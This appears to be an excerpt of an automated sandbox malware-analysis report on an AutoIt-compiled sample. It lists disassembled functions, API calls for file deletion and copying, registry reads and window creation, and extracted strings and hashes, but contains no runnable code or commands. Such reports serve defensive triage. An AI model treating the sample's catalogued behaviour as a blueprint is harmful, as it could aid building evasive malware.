__lseeki64_nolock.LIBCMT ref: 0066620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00666342
___createFile.LIBCMT ref: 00666361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0066636E
__dosmaperr.LIBCMT ref: 00666375
__free_osfhnd.LIBCMT ref: 00666395
__invoke_watson.LIBCMT ref: 006663C3
__wsopen_helper.LIBCMT ref: 006663DD

Strings

@, xrefs: 00665F98

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: a622ec3b552574a30fc88cf6e8b6f06cbbcbb314c02240bce64150760931518e
Instruction ID: 246e5e6eb2d9d925c25c26a24f95e4d05663331d39d5862ae7c3f14df929f108
Opcode Fuzzy Hash: a622ec3b552574a30fc88cf6e8b6f06cbbcbb314c02240bce64150760931518e
Instruction Fuzzy Hash: 6D22357190060A9BEF299F68EC56BFD7B63EF11314F244229F922AB3D2C6358D40C795

Function 0067FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0067FA96
_wcschr.LIBCMT ref: 0067FAA4
_wcscpy.LIBCMT ref: 0067FABB
_wcscat.LIBCMT ref: 0067FACA
_wcscat.LIBCMT ref: 0067FAE8
_wcscpy.LIBCMT ref: 0067FB09
__wsplitpath.LIBCMT ref: 0067FBE6
_wcscpy.LIBCMT ref: 0067FC0B
_wcscpy.LIBCMT ref: 0067FC1D
_wcscpy.LIBCMT ref: 0067FC32
_wcscat.LIBCMT ref: 0067FC47
_wcscat.LIBCMT ref: 0067FC59
_wcscat.LIBCMT ref: 0067FC6E

Part of subcall function 0067BFA4: _wcscmp.LIBCMT ref: 0067C03E
Part of subcall function 0067BFA4: __wsplitpath.LIBCMT ref: 0067C083
Part of subcall function 0067BFA4: _wcscpy.LIBCMT ref: 0067C096
Part of subcall function 0067BFA4: _wcscat.LIBCMT ref: 0067C0A9
Part of subcall function 0067BFA4: __wsplitpath.LIBCMT ref: 0067C0CE
Part of subcall function 0067BFA4: _wcscat.LIBCMT ref: 0067C0E4
Part of subcall function 0067BFA4: _wcscat.LIBCMT ref: 0067C0F7

Strings

t2n, xrefs: 0067FC97
>>>AUTOIT SCRIPT<<<, xrefs: 0067FA61

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2n
API String ID: 2955681530-643963574
Opcode ID: 2ce396cb0ac73623e12d3d210d891806307a63194e74bed84ef36782f245ebf2
Instruction ID: 9c872ecdd428005e49959f982d89dbd1e2e95855807d13e714e514051d09da2f
Opcode Fuzzy Hash: 2ce396cb0ac73623e12d3d210d891806307a63194e74bed84ef36782f245ebf2
Instruction Fuzzy Hash: 9E91B272504705AFDB60EB54C891F9BB3EABF84310F00896DF95997291DB30EA48CB96

Function 00633F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00633F86
RegisterClassExW.USER32(00000030), ref: 00633FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00633FC1
InitCommonControlsEx.COMCTL32(?), ref: 00633FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00633FEE
LoadIconW.USER32(000000A9), ref: 00634004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00634013

Strings

+, xrefs: 00633F6F
TaskbarCreated, xrefs: 00633FB6
AutoIt v3 GUI, xrefs: 00633FA2
0, xrefs: 00633F68

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 438ed722ed299384570458f2ace971e5d03b790a2d845c90abd9227a0c193420
Instruction ID: 8a1d1a8dc8139742be65f2609ed020db81a138ff3b45423b87ff3734ed24795d
Opcode Fuzzy Hash: 438ed722ed299384570458f2ace971e5d03b790a2d845c90abd9227a0c193420
Instruction Fuzzy Hash: 4821F7B5900318EFDB00DFA5E889BDDBBB6FB09740F10521AF511EA2A0EBB14584CF90

Function 0067BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0067BDB4: __time64.LIBCMT ref: 0067BDBE

Part of subcall function 00634517: _fseek.LIBCMT ref: 0063452F

__wsplitpath.LIBCMT ref: 0067C083

Part of subcall function 00651DFC: __wsplitpath_helper.LIBCMT ref: 00651E3C

_wcscpy.LIBCMT ref: 0067C096
_wcscat.LIBCMT ref: 0067C0A9
__wsplitpath.LIBCMT ref: 0067C0CE
_wcscat.LIBCMT ref: 0067C0E4
_wcscat.LIBCMT ref: 0067C0F7
_wcscmp.LIBCMT ref: 0067C03E

Part of subcall function 0067C56D: _wcscmp.LIBCMT ref: 0067C65D
Part of subcall function 0067C56D: _wcscmp.LIBCMT ref: 0067C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0067C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0067C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0067C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0067C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0067C371

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 1bc0f3c5beb6f4cd25302097a60dc06a5b0f1ffbd9a2ec1bef1ef3a762228ef8
Instruction ID: 2707e1f8c898930481ba95866f22c3e72d16cbde625ea80341ead40faeecb46e
Opcode Fuzzy Hash: 1bc0f3c5beb6f4cd25302097a60dc06a5b0f1ffbd9a2ec1bef1ef3a762228ef8
Instruction Fuzzy Hash: 1DC11DB1900219AFDF51DF95CC81EDEB7BEEF45310F1080AAF609E6152EB709A848F65

Function 00633742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 006337B3
KillTimer.USER32(?,00000001), ref: 006337DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00633800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0063380B
CreatePopupMenu.USER32 ref: 0063381F
PostQuitMessage.USER32(00000000), ref: 0063382E

Strings

TaskbarCreated, xrefs: 00633806

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: eca5663d9991c767859bed0a77db67cab81575d5ed421b08a7bea2391835867b
Instruction ID: f447d4ba7fba590d62965e0753ad511280de9aada2990b4f8216e00fbcf7bc0c
Opcode Fuzzy Hash: eca5663d9991c767859bed0a77db67cab81575d5ed421b08a7bea2391835867b
Instruction Fuzzy Hash: 664119F511416AE7DB14AF689C4DBBA37A7FB02340F001129F602DA391DF619E41DBA9

Function 00633E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00633E79
LoadCursorW.USER32(00000000,00007F00), ref: 00633E88
LoadIconW.USER32(00000063), ref: 00633E9E
LoadIconW.USER32(000000A4), ref: 00633EB0
LoadIconW.USER32(000000A2), ref: 00633EC2

Part of subcall function 00634024: LoadImageW.USER32(00630000,00000063,00000001,00000010,00000010,00000000), ref: 00634048

RegisterClassExW.USER32(?), ref: 00633F30

Part of subcall function 00633F53: GetSysColorBrush.USER32(0000000F), ref: 00633F86
Part of subcall function 00633F53: RegisterClassExW.USER32(00000030), ref: 00633FB0
Part of subcall function 00633F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00633FC1
Part of subcall function 00633F53: InitCommonControlsEx.COMCTL32(?), ref: 00633FDE
Part of subcall function 00633F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00633FEE
Part of subcall function 00633F53: LoadIconW.USER32(000000A9), ref: 00634004
Part of subcall function 00633F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00634013

Strings

AutoIt v3, xrefs: 00633F1F
#, xrefs: 00633F09
0, xrefs: 00633F02

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 4147d89e93695cb6ed20b43330a966e35785b27d49ceb884ea7ba3d32a198fe2
Instruction ID: a418e6ef410396bde3c24abc9b25bda2cdb5c768b29cd1d6faf8debaa3fcc57e
Opcode Fuzzy Hash: 4147d89e93695cb6ed20b43330a966e35785b27d49ceb884ea7ba3d32a198fe2
Instruction Fuzzy Hash: 90213CB0D04314EBDB04DFA9EC49AA9BFF7EB49350F10522AE214AA3A0DB754640CF95

Function 012F73C8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 012F7499
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 012F76BF

Memory Dump Source

Source File: 00000000.00000002.1270023088.00000000012F4000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f4000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: b34082fb85a569ee98949158a7b6397caf33f7f883419e8462d596bf3b6cf46a
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: 97A1F570E10209EBDB14CFA8D999BEEFBB5FF48304F208569E605BB280D7759A41CB54

Function 006349FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00634A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006A41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006A421A
RegCloseKey.ADVAPI32(?), ref: 006A4249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00634A13
Include, xrefs: 006A41D3, 006A4212

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: a18e3324eb988b85e25af609fde16253e37b1044129a4ba669b166118035a17c
Instruction ID: e9856b4ed326f28642b80ff9613617cc41d306bc206565d681821bd2d735244e
Opcode Fuzzy Hash: a18e3324eb988b85e25af609fde16253e37b1044129a4ba669b166118035a17c
Instruction Fuzzy Hash: D4113DB1A00109BEEB04AFA4CD86EFF7BBDEF05344F005069B506D6191EE70AE429B54

Function 006336B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006336E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00633707
ShowWindow.USER32(00000000,?,?,?,?,00633AA3,?), ref: 0063371B
ShowWindow.USER32(00000000,?,?,?,?,00633AA3,?), ref: 00633724

Strings

AutoIt v3, xrefs: 006336DE, 006336E3, 006336E4
edit, xrefs: 00633701

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 30b31f3a89a67eb1c88f0e11991e0d681068a451feabfc0943b0326ab89fb43e
Instruction ID: 893da27573a1011d31e2c8302838f1e5ca5d5bfee8be477c4d14ca3b5930b952
Opcode Fuzzy Hash: 30b31f3a89a67eb1c88f0e11991e0d681068a451feabfc0943b0326ab89fb43e
Instruction Fuzzy Hash: A1F0DA715402D4BAE7315B57AC08E772E7FD7C7FA0B01112EBA04AA1A0DD620895DAB0

Function 012F7178 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 012F7068: Sleep.KERNELBASE(000001F4), ref: 012F7079

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 012F72BB

Strings

AD3ARK4MHVY894RY8DIH, xrefs: 012F731E, 012F7321

Memory Dump Source

Source File: 00000000.00000002.1270023088.00000000012F4000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f4000_HN1GiQ5tF7.jbxd

Similarity

API ID: CreateFileSleep
String ID: AD3ARK4MHVY894RY8DIH
API String ID: 2694422964-1951621336
Opcode ID: 5e4369fa190477bcb7bb6c2e41535f9fd5ba4ed533a04b2c26c6911401790bdc
Instruction ID: 1b4a56ab8822a396a0fe7e8b290daac56c0a3065e372ffe632dfaf2d22413b5d
Opcode Fuzzy Hash: 5e4369fa190477bcb7bb6c2e41535f9fd5ba4ed533a04b2c26c6911401790bdc
Instruction Fuzzy Hash: 16518130D14248EAEF11DBB4D845BEEBB79AF19300F0041ADE748BB2C1D6B91B49CB65

Function 00634A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00635374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006F1148,?,006361FF,?,00000000,00000001,00000000), ref: 00635392

Part of subcall function 006349FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00634A1D

_wcscat.LIBCMT ref: 006A2D80
_wcscat.LIBCMT ref: 006A2DB5

Strings

8!o, xrefs: 00634B1C
\, xrefs: 006A2DA2
\Include\, xrefs: 00634B0A

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!o$\$\Include\
API String ID: 3592542968-1086848625
Opcode ID: 85ebe4cd4b3b45cc27dd23d9d45c721a09e3762ae86ff80186cd7ca59d804364
Instruction ID: 26c0721d419d609e3afd5be434bdf47627dfc32d866918a4b0b87c7f17c6cdb1
Opcode Fuzzy Hash: 85ebe4cd4b3b45cc27dd23d9d45c721a09e3762ae86ff80186cd7ca59d804364
Instruction Fuzzy Hash: EC5180714043429BC344EF59E9A28AAB7FBFF5A300F40552EF74593261EB309948CF9A

Function 006351AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0063522F
_wcscpy.LIBCMT ref: 00635283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00635293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006A3CB0

Strings

Line: , xrefs: 006A3CD9

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 68acd9d50ebb9fc719880ba59aaf2a7bafe7834f87ce1e165b1dddc3869cc4d2
Instruction ID: cde31f38bf7e2efd278d548b9f7c980f40374d5ae61d6b884f707ac51352e0b2
Opcode Fuzzy Hash: 68acd9d50ebb9fc719880ba59aaf2a7bafe7834f87ce1e165b1dddc3869cc4d2
Instruction Fuzzy Hash: B8319E71008740ABD361EB60DC46FEBB7DAAF45350F00451EF58697191EF70A648CBDA

Function 00634139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 006341A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006339FE,?,00000001), ref: 006341DB

_free.LIBCMT ref: 006A36B7
_free.LIBCMT ref: 006A36FE

Part of subcall function 0063C833: __wsplitpath.LIBCMT ref: 0063C93E
Part of subcall function 0063C833: _wcscpy.LIBCMT ref: 0063C953
Part of subcall function 0063C833: _wcscat.LIBCMT ref: 0063C968
Part of subcall function 0063C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0063C978

Strings

Bad directive syntax error, xrefs: 006A36E4
>>>AUTOIT SCRIPT<<<, xrefs: 006A3491

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 86382101abf16970920287a87d5a43b2936dc0d118779ce32e0e791cbed83442
Instruction ID: 98fc180e7562534994faf201ecaf0073ba248590cc826462c1edd0ede2f522e5
Opcode Fuzzy Hash: 86382101abf16970920287a87d5a43b2936dc0d118779ce32e0e791cbed83442
Instruction Fuzzy Hash: 61912A71910229ABCF44EFA4CC919EEB7B6BF19310F10442DF816AB391DB74AA45CF94

Function 006340E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A3725
GetOpenFileNameW.COMDLG32 ref: 006A376F

Part of subcall function 0063660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006353B1,?,?,006361FF,?,00000000,00000001,00000000), ref: 0063662F

Part of subcall function 006340A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006340C6

Strings

X, xrefs: 006A373E
t3n, xrefs: 006A3745

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3n
API String ID: 3777226403-3968377501
Opcode ID: 9bc68082574837a7f84edb8e9c755898670cfb1569c8a51ed346d0fa248da4dc
Instruction ID: ec63964a7f369a80bfa908dc822220bd8d31f77ac659c5bc84bbd61a6e4bb90d
Opcode Fuzzy Hash: 9bc68082574837a7f84edb8e9c755898670cfb1569c8a51ed346d0fa248da4dc
Instruction Fuzzy Hash: 8F21A871A10298ABCB41DF94DC45BEEBBFA9F49304F00405DE405A7381DFB49A898FA5

Function 006534AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 006534FE

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00653539
__wopenfile.LIBCMT ref: 00653549

Strings

<G, xrefs: 006534CD, 006534F0, 006534FC

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 94d22742e2c4958dd3c20214357dc331e9335316717eaff15adae0688be17c2b
Instruction ID: e0f30dfc273456d3092cb5b7db435836cf0aff13b278e4c5799b1f80c792dc2b
Opcode Fuzzy Hash: 94d22742e2c4958dd3c20214357dc331e9335316717eaff15adae0688be17c2b
